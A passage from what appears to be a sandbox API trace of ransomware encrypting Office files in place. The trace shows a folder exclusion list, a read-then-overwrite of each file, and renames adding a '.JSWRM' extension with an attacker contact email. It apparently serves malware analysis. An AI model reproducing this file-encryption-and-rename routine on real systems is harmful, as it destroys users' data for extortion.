hHeap=0x1e0000) returned 1 [0119.021] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR24F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir24f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR24F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir24f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0119.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.022] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3187, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR25F.GIF", cAlternateFileName="")) returned 1 [0119.022] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2=".") returned 1 [0119.022] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="..") returned 1 [0119.023] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="...") returned 1 [0119.023] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="windows") returned -1 [0119.023] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="recovery") returned -1 [0119.023] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="perflogs") returned -1 [0119.023] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="documents and settings") returned 1 [0119.023] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.023] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="system volume information") returned -1 [0119.023] lstrcmpiW (lpString1="PDIR25F.GIF", lpString2="msocache") returned 1 [0119.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR25F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR25F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR25F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0119.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR25F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR25F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR25F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0119.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR25F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir25f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.024] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12679) returned 1 [0119.024] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3180) returned 0x24c1d0 [0119.024] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3180, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x3180, lpOverlapped=0x0) returned 1 [0119.030] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.030] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3180, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x3180, lpOverlapped=0x0) returned 1 [0119.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.030] CloseHandle (hObject=0x314) returned 1 [0119.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0119.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0119.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0119.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0119.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR25F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir25f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR25F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir25f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0119.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0119.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.031] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1985, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR26F.GIF", cAlternateFileName="")) returned 1 [0119.031] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2=".") returned 1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="..") returned 1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="...") returned 1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="windows") returned -1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="recovery") returned -1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="perflogs") returned -1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="documents and settings") returned 1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="system volume information") returned -1 [0119.033] lstrcmpiW (lpString1="PDIR26F.GIF", lpString2="msocache") returned 1 [0119.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0119.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR26F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR26F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR26F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0119.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR26F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR26F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR26F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR26F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir26f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.034] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6533) returned 1 [0119.034] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1980) returned 0x24c1d0 [0119.034] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1980, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1980, lpOverlapped=0x0) returned 1 [0119.036] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.036] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1980, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1980, lpOverlapped=0x0) returned 1 [0119.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.036] CloseHandle (hObject=0x314) returned 1 [0119.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0119.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0119.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0119.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.036] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR26F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir26f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR26F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir26f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0119.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.037] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cd3, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR27F.GIF", cAlternateFileName="")) returned 1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2=".") returned 1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="..") returned 1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="...") returned 1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="windows") returned -1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="recovery") returned -1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="perflogs") returned -1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="documents and settings") returned 1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.037] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="system volume information") returned -1 [0119.038] lstrcmpiW (lpString1="PDIR27F.GIF", lpString2="msocache") returned 1 [0119.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR27F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR27F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR27F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0119.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR27F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR27F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR27F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0119.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR27F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir27f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.039] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7379) returned 1 [0119.039] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1cd0) returned 0x24c1d0 [0119.039] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1cd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1cd0, lpOverlapped=0x0) returned 1 [0119.042] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.042] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1cd0, lpOverlapped=0x0) returned 1 [0119.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.042] CloseHandle (hObject=0x314) returned 1 [0119.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0119.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0119.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0119.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.042] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR27F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir27f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR27F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir27f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0119.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.043] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x684, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR28B.GIF", cAlternateFileName="")) returned 1 [0119.043] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2=".") returned 1 [0119.043] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="..") returned 1 [0119.043] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="...") returned 1 [0119.043] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="windows") returned -1 [0119.044] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="recovery") returned 